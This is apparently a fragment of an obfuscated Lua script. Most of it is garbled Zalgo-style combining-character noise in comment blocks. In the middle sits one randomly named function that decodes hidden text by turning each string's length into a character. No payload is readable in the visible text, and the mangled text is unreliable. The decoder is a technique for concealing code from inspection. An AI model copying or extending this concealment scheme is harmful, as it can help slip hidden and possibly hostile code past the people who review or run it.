ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœÌ«Ì¡Ì¦Ì£Ì¡Ì£Ì Í‡Ì¦Ì¦Ì¯Ì³Í‰Ì¼Ì±Ì² ÌµÌ€Í—Ì…ÌÍÍ›ÌŒÌŽÌ›Í Í€Í‹Ì‰Ì”Í›Ì‚ÍƒÌ¿Í„Í’Ì‡Í„ÍŠÍ„Ì¨Ì²Ì±ÌœÍˆÌ™Ì¦Ì¥ÌªÌ£Ì£Í‰Í…Ì°Ì°ÍŽÌ²Ì¦Ì°Ì™LÌ·Í€ÍÌŒÌ«Ì¡Ì©Ì–Ì¼Ì­Ì¨Ì–ÍˆÌŸÌ¢Ì–ÍšÌ³Ì°Ì»Í™Ì¦Ì¯Í“Ì¼Í–ÌÌ±Ì¦Ì³ÍœÌ¼Ì˜OÌ·Í‹ÌÍŒÌ‹ÌŽÌ”Ì…ÌŽÍ Í€Ì‚Í˜ÌŒÌ”ÍŒÍÌ”Í’ÍÍÌÌ€Ì’ÍŠÌ¿Ì±Í‰ÍŽÌ°Ì©Í‰Ì¥ÍŽÌ Í“Í‡Ì¼Ì¼Ì¨vÌµÌ‘ÍÍ€ÌƒÌ‡ÍÍ‹Ì›ÍÍÌ”ÌÍ„Ì¾ÍÍÌÌÌ¹Ì¼Í‡Ì¢Ì²Í•Ì£ÌœÌ°Í…Ì–Í–Ì²ÍœÌœÌ­Í”Ì¬Í“eÌ¶Ì½Ì„ÌÌ•Í‹Ì½Í˜Ì„Í‘Í›Ì’ÌÌƒÌ‹Ì¯ÍœÌ˜Í‰ÌœÌ°Ì¼Ì˜Í•Í“Í–Ì³Ì¬ÌžÌœÌ«ÌªÌŸÍ–ÍˆÌ» Ì¸Ì‘Ì‚Í€ÌˆÍ Ì•Í€Í„Ì¾ÍŠÌ‚Í„Ì¾Í‘ÌŽÍŠÍ‹Í‚Í‚Ì…Í†Í†ÌˆÍ€Ì˜Ì Ì˜Ì¡Ì¯Ì¦Ì«Ì¬ÌžÌ¤Ì®Ì¥Ì Ì­ÌºÌ¤Ì™CÌ¸Í—Í†ÌŠÍŒÌ‘Í›Í„Ì…Ì’ÍƒÍ„Ì½Ì³Ì®Í‡Ì¨Í”Ì—Ì¤Ì¹ÍšÌ Ì®Ì¨ÌÍ“Ì˜Ì²Í”oÌ¸Í„ÍŠÌÌŽÍ€Í‘Ì‘Ì¾ÍŠÌ‰Í›Ì½ÍŒÍÌ½Í†Í†Í‚Ì†ÌŠÌ”Í…Ì Ì ÍÌŸÌ¹Í™Ì°Ì³ÍˆÍ“Ì¢Ì¬Ì™Ì¢Ì³Ì˜oÌ´ÌÍ ÍÍŒÍ€Í„ÌÌ“ÍÍ‘ÌÌ”Ì¾ÍÌ‡ÌŸÍ‡Ì¯Ì»Ì»Ì¼ÌžÌ£Ì­Ì¡Í–ÌœkÌµÍÌ€Í›Ì…ÍÌ‚Ì’ÍŠÍ›ÍŠÌ±Ì£Ì¨Ì­ÌºÌÌ—ÌŸÌ¹Í•ÌºÌ¼ÌŸÌÌÌ¬ÌŸÍˆÍœÍˆÌŸÌ¹Ì«ÌœÌ™ÌªÌ™Ì©Ì«Ì»iÌ¶ÌšÍ‘Ì…Ì„Í„ÌˆÌ•Ì€ÌšÍ€Ì¿Í†Í”ÌŸÌ—Ì¯Ì¼Í…Ì¡Ì³Ì¥Í–eÌ¸ÌÌ€Í„Í„ÌÌÌÍ‚ÍÌ³Ì¢ÍÍŽÌ¢sÌ·Í’Ì‰ÌŠÌ—Ì–ÍœÌžÌºÌ¦Ì—Í”Ì«Ì¥ÌŸÌ Ì³IÌ¶ÌšÍÌ„Ì†Ì†ÌÌÌ„ÌÌ¿ÌƒÍ„Í„Í‘ÍÌ¬ÌœÍœ
]]
function BVCzxjNazWtiRKQfQjkqLjljqksRMjVw(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 

--[[
gÌµÍÌ‘ÍÌ¿Í‘ÍˆÌœÌ³Ì¹ÌžÌ¶Í›Í€Ì‘Ì‰Í‘Ì‘Ì•Í’Í„ÌªÌ™sÌ¶Ì›ÌÍƒÌ“Ì‡Í—Í’ÍŠÌ”Í›Ì©Ì—Ì–Ì©ÍšÌ—Ì¨Ì´ÍÌŒÍ‚ÍƒÍÍÌ¯Ì Ì¼Ì¯Í“uÌ¶ÌƒÌ‹Ì”ÍŒÌÍ‚ÌÍ—ÍÍ‚Ì Ì¼Í‰Ì¨Ì£Í™Ì¶ÍÌšÌ½ÌšÌÌžbÌ´Í†Í„Ì›ÌƒÌ“Ì…Í‚Ì„ÍƒÍ‘Ì¹;Ì·ÌˆÍÍ€Í„Ì„Ì“ÍƒÍˆÌ—Í”Ì³ÌžÌ­Ì©Ì¬Ì©Ì˜lÌ´Ì‰Í‚Ì‰Ì‰Ì¾Ì…Í‘Ì‚ÌŸÌŸÌ–Ì¹ÍŽÍ…ÍšÌ¸Í†Ì½Ì›Ì†ÌŽÌ‘Ì¦Ì¢Í‡oÌ¶Í›ÌƒÌ«Í‰Ì§Ì¡Ì²Í”Í“ÌµÌÌˆÍ—ÌŸÌŸÌ±Ì¹Í•ÌœÌŸÌ¨Í‡Ì—cÌµÌÌ›Í„ÌšÌ‹ÌŠÍ“Ì­Ì¯ÍÍÍ™Ì¨ÍˆÌ¶Ì“Ì†Í’ÍŽaÌ¶Í€Í„Í‚Ì“Ì•ÌšÍ’Ì½ÍŒÌ•Í…ÍŽÍ”Ì·ÌˆÍÍ€Í„Ì„Ì“ÍƒÍˆÌ—Í”Ì³ÌžÌ­Ì©Ì¬Ì©Ì˜lÌ´Ì‰Í‚Ì‰Ì‰Ì¾Ì…Í‘Ì‚ÌŸÌŸÌ–Ì¹ÍŽÍ…ÍšÌ¶Ì½ÍÍŒÍ’ÌÍ’ÍšÍ™Ì³ÌœÌ¨1Ì¸Ì¿ÌÌ¨ÌµÌ’ÌŸÌ—2Ì´Í†Ì¬Ì±Ì¸Ì‰Ì‘Ì•Ì¿Ì„ÌÍ ÌŠÌ­Ì—Ì¦3Ì·Ì‘ÍŽÍ™Í”Ì³Ì¤Ì¨Ì¦ÌµÍ†ÍšÍ“Ì®Ì»Ì³4Ì·ÌŒÌœÌ±Ì²ÌœÌ¶Ì‹Ì‘Ì•Í˜Ì‚Ì’Ì²Í™Ì£Ì®ÍˆÌ«Ì¼5ÌµÌ€ÌšÌ”Ì½Í ÍÌ¯ÌªÌ¢_Ì¶ÍÌšÌ½ÌšÌÌžbÌ´Í†Í„Ì›ÌƒÌ“Ì…Í‚Ì„ÍƒÍ‘Ì¹Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨Ì¸Ì“Í—Í‹Ì½Í’ÌšÌ•ÍŒÍ†Ì½Í–Ì¡Ì™ÌŸÍ‰tÌ¶Í„Ì†ÌÌ¡ÍœÌ¢Í‡Ì±Ì¡Ì¼ÌºÌÌ¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­[Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­,Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­ÌµÍ’ÍÌŒÌÍ€ÍŒÌ“Í Í‘Ì®Ì Ì˜Ì—Í…Ì©Ì±Ì¬Í‰zÌ´ÌƒÌÌ¾ÌšÌ€ÌªÍ•Ì»ÌœÌ«Ì¬ÍÌµÍ’ÍÌŒÌÍ€ÍŒÌ“Í Í‘Ì®Ì Ì˜Ì—Í…Ì©Ì±Ì¬Í‰zÌ´ÌƒÌÌ¾ÌšÌ€ÌªÍ•Ì»ÌœÌ«Ì¬ÍÌ¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨,Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­ÌµÍ’ÍÌŒÌÍ€ÍŒÌ“Í Í‘Ì®Ì Ì˜Ì—Í…Ì©Ì±Ì¬Í‰zÌ´ÌƒÌÌ¾ÌšÌ€ÌªÍ•Ì»ÌœÌ«Ì¬ÍÌ´ÍÌŒÍ‚ÍƒÍÍÌ¯Ì Ì¼Ì¯Í“uÌ¶ÌƒÌ‹Ì”ÍŒÌÍ‚ÌÍ—ÍÍ‚Ì Ì¼Í‰Ì¨Ì£Í™Ì¶Í›Í€Ì‘Ì‰Í‘Ì‘Ì•Í’Í„ÌªÌ™sÌ¶Ì›ÌÍƒÌ“Ì‡Í—Í’ÍŠÌ”Í›Ì©Ì—Ì–Ì©ÍšÌ—Ì¨], Ì¸Í†Ì½Ì›Ì†ÌŽÌ‘Ì¦Ì¢Í‡oÌ¶Í›ÌƒÌ«Í‰Ì§Ì¡Ì²Í”Í“Ì´Ì…ÌˆÌžÌ£Ì¦Í‰rÌ¶Ì…Ì’ÌÌƒÌÌ–ÍÍÌ®Ì¹Ì¥ [ÌµÍ—Ì‰Ì¿Ì›Ì‡Ì†ÍÌ§Í‡Í•Ì³kÌ¸Ì‘Ì‡Í„Ì•Ì›Ì…Í˜Í€Ì¡Ì–Í‡Ì™ÍœÌ±Ì®Ì¶Ì“Ì†Í’ÍŽaÌ¶Í€Í„Í‚Ì“Ì•ÌšÍ’Ì½ÍŒÌ•Í…ÍŽÍ”Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨ÌµÌ†ÌŒÍ—Í‹Ì†Ì†Í‚Í†ÍƒÍ’Í‡Ì™Ì°Ì³Ì¦Ì£Í‡nÌ·Í’ÌˆÍ’Ì‘Í€Ì•Ì‘Ì°Ì©Ì Ì¦Ì¢Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­,Ì´Í—ÌŽÌÌ‹ÌšÌ½Í•Í‰Ì¹ÍœÍœÌ¬Ì»mÌ¶Í›Ì»Ì–Ì¼Ì«ÌŸÌ´Ì…ÌˆÌžÌ£Ì¦Í‰rÌ¶Ì…Ì’ÌÌƒÌÌ–ÍÍÌ®Ì¹Ì¥Ì·ÍŠÌ‘ÌÌ½Ì‚Ì ÌŸÌ—Ì­Ì®Ì§Ì¹Ì¹Ì˜Í”wÌ¸Í›Í‘Ì‰Í˜Ì¨Ì§Ì Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­Ì¶Í›Í€Ì‘Ì‰Í‘Ì‘Ì•Í’Í„ÌªÌ™sÌ¶Ì›ÌÍƒÌ“Ì‡Í—Í’ÍŠÌ”Í›Ì©Ì—Ì–Ì©ÍšÌ—Ì¨Ì¸Ì“Í—Í‹Ì½Í’ÌšÌ•ÍŒÍ†Ì½Í–Ì¡Ì™ÌŸÍ‰tÌ¶Í„Ì†ÌÌ¡ÍœÌ¢Í‡Ì±Ì¡Ì¼ÌºÌ,Ì¸Í†Ì½Ì›Ì†ÌŽÌ‘Ì¦Ì¢Í‡oÌ¶Í›ÌƒÌ«Í‰Ì§Ì¡Ì²Í”Í“Ì·ÌˆÍÍ€Í„Ì„Ì“ÍƒÍˆÌ—Í”Ì³ÌžÌ­Ì©Ì¬Ì©Ì˜lÌ´Ì‰Í‚Ì‰Ì‰Ì¾Ì…Í‘Ì‚ÌŸÌŸÌ–Ì¹ÍŽÍ…ÍšÌ´ÌšÌ½ÌŠÍŒÌšÌ½Í†Í›ÌŠÍÌ—ÍœÌœÌŸÍ”Ì¼Ì²dÌ´Ì”Í‚Í›ÍƒÍƒÍ„ÍÍÌšÌŒÍ™ÍÍŽÌ¬Ì­ÌºÌµÍ—Ì‰Ì¿Ì›Ì‡Ì†ÍÌ§Í‡Í•Ì³kÌ¸Ì‘Ì‡Í„Ì•Ì›Ì…Í˜Í€Ì¡Ì–Í‡Ì™ÍœÌ±Ì®Ì¶Ì“Ì†Í’ÍŽaÌ¶Í€Í„Í‚Ì“Ì•ÌšÍ’Ì½ÍŒÌ•Í…ÍŽÍ”Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨ÌµÌ†ÌŒÍ—Í‹Ì†Ì†Í‚Í†ÍƒÍ’Í‡Ì™Ì°Ì³Ì¦Ì£Í‡nÌ·Í’ÌˆÍ’Ì‘Í€Ì•Ì‘Ì°Ì©Ì Ì¦Ì¢Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­] == "Ì·Í›Í‚ÍÌ†ÍÍÌ’Í’Ì¦NÌµÌŠÍ—Ì¾ÍŠÍ„ÍŽÌ·Ì‘Í‚Ì Ì¢Í‰Ì£ÌžÌ°ÍÌ«EÌµÍÌ³ÌºÍÌ£ÌžÌ­Í”ÍÌ¢ÍˆÌµÌ‡ÍŠÌˆÍ’Ì¹Ì Ì¦Ì±Ì°Ì Ì¦WÌ´Í‚ÍÌŒÌ½Ì¾Ì€Ì–Í“ÌºÌ¯Ì™ Ì¶ÌƒÌÌ³ÌºÍšÌªÍ‰Ì©AÌ¸Í Ì”ÌÍ™Ì°Ì«ÌžÌ·Í‘Í—ÌªÌ§ÌœÍ”ÍˆÌÌ­LÌ´Ì„Ì”ÌÌÍ‹ÌŒÍ‚ÌÍ“Ì™ÍœÌ¡Ì£ÍŽÌ®Ì°Ì¶Ì€Í„Ì•ÌÍ—Ì›ÌÌ¬Ì¹Ì—Ì²Ì­Í‡Í–BÌµÌƒÍŒÌ•Í˜Ì¹Í–Ì²Í‰Í–Í•Ì¸Ì‡Í‚Ì©Í…Í•ÍˆÌ²Ì³Ì³ÍŽÍ”Ì UÌ·Í˜Ì½ÌŒÌˆÍÍŽÍ™Ì·Í˜ÌšÌ­MÌ¶Í˜Í‚ÍÌ­ÌªÍ‰ÌºÌ¬Ì£Í“" Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­Ì·ÌˆÍÍ€Í„Ì„Ì“ÍƒÍˆÌ—Í”Ì³ÌžÌ­Ì©Ì¬Ì©Ì˜lÌ´Ì‰Í‚Ì‰Ì‰Ì¾Ì…Í‘Ì‚ÌŸÌŸÌ–Ì¹ÍŽÍ…ÍšÌ¶Í›Í€Ì‘Ì‰Í‘Ì‘Ì•Í’Í„ÌªÌ™sÌ¶Ì›ÌÍƒÌ“Ì‡Í—Í’ÍŠÌ”Í›Ì©Ì—Ì–Ì©ÍšÌ—Ì¨Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­Ì·ÌÍ—Ì‡ÌžÌ³Ì˜Ì¢Ì¦iÌ·ÍƒÌÍÍ‚Ì»Ì­ÌÌºÌ¼Ì§Ì¢Ì·ÌÌ“Í’ÍŒÍ Ì¨Ì»fÌ¸Í„Í›ÌœÍˆÍ•Ì© {Ì´ÌšÌ½ÌŠÍŒÌšÌ½Í†Í›ÌŠÍÌ—ÍœÌœÌŸÍ”Ì¼Ì²dÌ´Ì”Í‚Í›ÍƒÍƒÍ„ÍÍÌšÌŒÍ™ÍÍŽÌ¬Ì­ÌºÌ¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­Ì¸Í†Ì½Ì›Ì†ÌŽÌ‘Ì¦Ì¢Í‡oÌ¶Í›ÌƒÌ«Í‰Ì§Ì¡Ì²Í”Í“Ì¶ÍÌšÌ½ÌšÌÌžbÌ´Í†Í„Ì›ÌƒÌ“Ì…Í‚Ì„ÍƒÍ‘Ì¹Ì·ÌÌ“Í’ÍŒÍ Ì¨Ì»fÌ¸Í„Í›ÌœÍˆÍ•Ì©Ì´ÍÌŒÍ‚ÍƒÍÍÌ¯Ì Ì¼Ì¯Í“uÌ¶ÌƒÌ‹Ì”ÍŒÌÍ‚ÌÍ—ÍÍ‚Ì Ì¼Í‰Ì¨Ì£Í™Ì¶Í›Í€Ì‘Ì‰Í‘Ì‘Ì•Í’Í„ÌªÌ™sÌ¶Ì›ÌÍƒÌ“Ì‡Í—Í’ÍŠÌ”Í›Ì©Ì—Ì–Ì©ÍšÌ—Ì¨ÌµÌÌˆÍ—ÌŸÌŸÌ±Ì¹Í•ÌœÌŸÌ¨Í‡Ì—cÌµÌÌ›Í„ÌšÌ‹ÌŠÍ“Ì­Ì¯ÍÍÍ™Ì¨ÍˆÌ¶Ì“Ì†Í’ÍŽaÌ¶Í€Í„Í‚Ì“Ì•ÌšÍ’Ì½ÍŒÌ•Í…ÍŽÍ”Ì¸Ì“Í—Í‹Ì½Í’ÌšÌ•ÍŒÍ†Ì½Í–Ì¡Ì™ÌŸÍ‰tÌ¶Í„Ì†ÌÌ¡ÍœÌ¢Í‡Ì±Ì¡Ì¼ÌºÌÌ¸Í†Ì½Ì›Ì†ÌŽÌ‘Ì¦Ì¢Í‡oÌ¶Í›ÌƒÌ«Í‰Ì§Ì¡Ì²Í”Í“Ì´Ì…ÌˆÌžÌ£Ì¦Í‰rÌ¶Ì…Ì’ÌÌƒÌÌ–ÍÍÌ®Ì¹Ì¥.ÌµÌÌˆÍ—ÌŸÌŸÌ±Ì¹Í•ÌœÌŸÌ¨Í‡Ì—cÌµÌÌ›Í„ÌšÌ‹ÌŠÍ“Ì­Ì¯ÍÍÍ™Ì¨ÍˆÌ¸Í†Ì½Ì›Ì†ÌŽÌ‘Ì¦Ì¢Í‡oÌ¶Í›ÌƒÌ«Í‰Ì§Ì¡Ì²Í”Í“Ì´ÌšÌ½ÌŠÍŒÌšÌ½Í†Í›ÌŠÍÌ—ÍœÌœÌŸÍ”Ì¼Ì²dÌ´Ì”Í‚Í›ÍƒÍƒÍ„ÍÍÌšÌŒÍ™ÍÍŽÌ¬Ì­ÌºÌ¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­ = Ì¶Ì‚Í„ÌÌŽÍ›ÌÍ‹Ì›Í„Ì³Ì²ÌÌ Í“Í–OÌ·ÌÌ‰Ì„ÌŽÌˆÍÌªÌ®Ì¤Ì¢Ì¥ÌºÌ°Ì°ÌµÌ†ÌŒÍ—Í‹Ì†Ì†Í‚Í†ÍƒÍ’Í‡Ì™Ì°Ì³Ì¦Ì£Í‡nÌ·Í’ÌˆÍ’Ì‘Í€Ì•Ì‘Ì°Ì©Ì Ì¦Ì¢Ì·ÌÍ—Ì‡ÌžÌ³Ì˜Ì¢Ì¦iÌ·ÍƒÌÍÍ‚Ì»Ì­ÌÌºÌ¼Ì§Ì¢ÌµÌ†Ì…ÌÌ—Ì™Ì Ì­Ì˜SÌ¶ÌÍ†Ì¿Ì†Í€Ì ÌžÌ˜Ì¦Ì¯Ì¼Ì£Ì¥Ì©Ì®Ì·Í’Ì€Ì¥Í‰Ì ÍŽÌ°ÍšÌ¯Í”hÌ·Ì’Í“ÍœÌ«Ì¬ÍšÌ¹Í“Í…Ì¢Ì²Ì·ÌÍ—Ì‡ÌžÌ³Ì˜Ì¢Ì¦iÌ·ÍƒÌÍÍ‚Ì»Ì­ÌÌºÌ¼Ì§Ì¢Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­Ì·ÌˆÍÍ€Í„Ì„Ì“ÍƒÍˆÌ—Í”Ì³ÌžÌ­Ì©Ì¬Ì©Ì˜lÌ´Ì‰Í‚Ì‰Ì‰Ì¾Ì…Í‘Ì‚ÌŸÌŸÌ–Ì¹ÍŽÍ…ÍšÌ´ÌšÌ½ÌŠÍŒÌšÌ½Í†Í›ÌŠÍÌ—ÍœÌœÌŸÍ”Ì¼Ì²dÌ´Ì”Í‚Í›ÍƒÍƒÍ„ÍÍÌšÌŒÍ™ÍÍŽÌ¬Ì­Ìº_Ì¶Ì½ÍÍŒÍ’ÌÍ’ÍšÍ™Ì³ÌœÌ¨1Ì¸Ì¿ÌÌ¨Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨ÌµÌ’ÌŸÌ—2Ì´Í†Ì¬Ì±Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­Ì¸Ì‰Ì‘Ì•Ì¿Ì„ÌÍ ÌŠÌ­Ì—Ì¦3Ì·Ì‘ÍŽÍ™Í”Ì³Ì¤Ì¨Ì¦,Ì¶Ì½ÍÍŒÍ’ÌÍ’ÍšÍ™Ì³ÌœÌ¨1Ì¸Ì¿ÌÌ¨Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨ÌµÌ’ÌŸÌ—2Ì´Í†Ì¬Ì±Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­Ì¸Ì‰Ì‘Ì•Ì¿Ì„ÌÍ ÌŠÌ­Ì—Ì¦3Ì·Ì‘ÍŽÍ™Í”Ì³Ì¤Ì¨Ì¦ÌµÍ’ÍÌŒÌÍ€ÍŒÌ“Í Í‘Ì®Ì Ì˜Ì—Í…Ì©Ì±Ì¬Í‰zÌ´ÌƒÌÌ¾ÌšÌ€ÌªÍ•Ì»ÌœÌ«Ì¬ÍÌµÍ†ÍšÍ“Ì®Ì»Ì³4Ì·ÌŒÌœÌ±Ì²ÌœÌµÍ’ÍÌŒÌÍ€ÍŒÌ“Í Í‘Ì®Ì Ì˜Ì—Í…Ì©Ì±Ì¬Í‰zÌ´ÌƒÌÌ¾ÌšÌ€ÌªÍ•Ì»ÌœÌ«Ì¬ÍÌ¶Ì‹Ì‘Ì•Í˜Ì‚Ì’Ì²Í™Ì£Ì®ÍˆÌ«Ì¼5ÌµÌ€ÌšÌ”Ì½Í ÍÌ¯ÌªÌ¢Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨,Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨Ì¶Ì½ÍÍŒÍ’ÌÍ’ÍšÍ™Ì³ÌœÌ¨1Ì¸Ì¿ÌÌ¨Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­ÌµÌ’ÌŸÌ—2Ì´Í†Ì¬Ì±ÌµÍ’ÍÌŒÌÍ€ÍŒÌ“Í Í‘Ì®Ì Ì˜Ì—Í…Ì©Ì±Ì¬Í‰zÌ´ÌƒÌÌ¾ÌšÌ€ÌªÍ•Ì»ÌœÌ«Ì¬ÍÌ¸Ì‰Ì‘Ì•Ì¿Ì„ÌÍ ÌŠÌ­Ì—Ì¦3Ì·Ì‘ÍŽÍ™Í”Ì³Ì¤Ì¨Ì¦Ì´ÍÌŒÍ‚ÍƒÍÍÌ¯Ì Ì¼Ì¯Í“uÌ¶ÌƒÌ‹Ì”ÍŒÌÍ‚ÌÍ—ÍÍ‚Ì Ì¼Í‰Ì¨Ì£Í™ÌµÍ†ÍšÍ“Ì®Ì»Ì³4Ì·ÌŒÌœÌ±Ì²ÌœÌ¶Í›Í€Ì‘Ì‰Í‘Ì‘Ì•Í’Í„ÌªÌ™sÌ¶Ì›ÌÍƒÌ“Ì‡Í—Í’ÍŠÌ”Í›Ì©Ì—Ì–Ì©ÍšÌ—Ì¨.ÌµÍ—Ì‰Ì¿Ì›Ì‡Ì†ÍÌ§Í‡Í•Ì³kÌ¸Ì‘Ì‡Í„Ì•Ì›Ì…Í˜Í€Ì¡Ì–Í‡Ì™ÍœÌ±Ì®Ì¶Ì½ÍÍŒÍ’ÌÍ’ÍšÍ™Ì³ÌœÌ¨1Ì¸Ì¿ÌÌ¨Ì¶Ì“Ì†Í’ÍŽaÌ¶Í€Í„Í‚Ì“Ì•ÌšÍ’Ì½ÍŒÌ•Í…ÍŽÍ”ÌµÌ’ÌŸÌ—2Ì´Í†Ì¬Ì±Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨Ì¸Ì‰Ì‘Ì•Ì¿Ì„ÌÍ ÌŠÌ­Ì—Ì¦3Ì·Ì‘ÍŽÍ™Í”Ì³Ì¤Ì¨Ì¦ÌµÌ†ÌŒÍ—Í‹Ì†Ì†Í‚Í†ÍƒÍ’Í‡Ì™Ì°Ì³Ì¦Ì£Í‡nÌ·Í’ÌˆÍ’Ì‘Í€Ì•Ì‘Ì°Ì©Ì Ì¦Ì¢ÌµÍ†ÍšÍ“Ì®Ì»Ì³4Ì·ÌŒÌœÌ±Ì²ÌœÌ¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­,Ì´Í—ÌŽÌÌ‹ÌšÌ½Í•Í‰Ì¹ÍœÍœÌ¬Ì»mÌ¶Í›Ì»Ì–Ì¼Ì«ÌŸÌ¶Ì½ÍÍŒÍ’ÌÍ’ÍšÍ™Ì³ÌœÌ¨1Ì¸Ì¿ÌÌ¨Ì´Ì…ÌˆÌžÌ£Ì¦Í‰rÌ¶Ì…Ì’ÌÌƒÌÌ–ÍÍÌ®Ì¹Ì¥ÌµÌ’ÌŸÌ—2Ì´Í†Ì¬Ì±Ì·ÍŠÌ‘ÌÌ½Ì‚Ì 